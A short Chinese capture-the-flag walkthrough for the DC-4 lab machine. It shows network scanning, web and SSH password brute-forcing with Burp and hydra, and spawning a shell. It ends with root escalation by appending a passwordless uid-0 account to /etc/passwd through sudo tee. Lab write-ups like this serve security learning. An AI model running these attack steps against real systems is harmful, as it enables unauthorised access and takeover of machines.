DC-4靶机

ifconfig

查找主机IP

扫一波内网，探测下存活主机

nmap 192.168.61.0/24

打开显示的IP地址

burp爆破

用kali的/usr/share/john下的password.lst当字典，burp爆破

 

 暗示我们可以吧命令改成我们想运行的命令，比如反弹shell

kali开启监听，获取到信息

反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

尝试进入到home目录，看到三个三件夹，应该是三个用户

pwd

cd /home

ls

 查看jim，buckups里有old-passwords.bak文件，应该是密码文件

把密码保存为文件1

爆破密码

hydra -l jim -P 1 -t 10 ssh://192.168.61.132
或
hydra -l jim -P 1 192.168.61.132 ssh

然后连接密码 

ssh jim@192.168.61.132

表示有邮件

 

Charles(之前三个人名中出现过) 

然后还给了密码：^xHhA&hvim0y

登录了Charles

提权

sudo -l

sudo teehee -a /etc/passwd
root666::0:0::/bin/bash

然后ctrl+c保存

cat /etc/passwd

 写入成功

切换root666用户

su root666

 然后cat flag.txt就行了